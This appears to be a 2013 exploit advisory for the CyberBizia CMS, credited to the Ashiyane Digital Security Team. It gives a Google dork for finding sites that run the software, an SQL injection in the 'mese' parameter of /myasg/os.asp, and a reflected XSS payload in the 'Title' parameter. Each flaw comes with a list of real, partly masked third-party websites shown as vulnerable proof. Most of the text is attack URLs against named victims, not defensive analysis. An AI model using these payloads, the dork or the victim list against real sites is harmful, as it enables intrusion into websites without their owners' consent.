#********************************************************************************
# Exploit Title : CyberBizia Multiple Vulnerabilites
#
# Software link : http://www.cyberbizia.com
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered by CyberBizia"
#
# Date: 2013/08/29
#
--------------------------------------------------------------------
# Exploit 1 : Sql Inkection
#
# Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]
#
#
# Proof:
#
# http://www.advancXXXiology.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.artiXXXri.com/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.basketXXXtu.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cdsdonXXXliari.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.digXXXt.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cosXXXo.com/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cdsdXXXecagliari.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.baskXXXrtu.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.immobiXXXacanze.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.magXXweb.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.archXXXeno.it/myasg/os.asp?elenca=mese&mese=1'
--------------------------------------------------------------------
# Exploit 2 :
#
# Location : [Target]t/?Title=[xss]
#
#
# Proof:
#
# http://www.advaXXXdiology.it/?Title="/><script>alert(1);</script>
#
# http://www.artXri.com/?Title="/><script>alert(1);</script>
#
# http://www.basketquartXXu.it/?Title="/><script>alert(1);</script>
#
# http://www.cdsdonnXXXecagliari.it/?Title="/><script>alert(1);</script>
#
# http://www.digicsXXoft.it/?Title="/><script>alert(1);</script>
#
# http://www.costiaXXXuto.com/?Title="/><script>alert(1);</script>
#
# http://www.cdsdonXXnecagliari.it/?Title="/><script>alert(1);</script>
#
# http://www.baskXXuartu.it/?Title="/><script>alert(1);</script>
#
# http://www.iXXXarevacanze.it/?Title="/><script>alert(1);</script>
#
# http://www.mozXXXna.com/?Title="/><script>alert(1);</script>
#
# http://www.aXXXXXXleno.it/?Title="/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################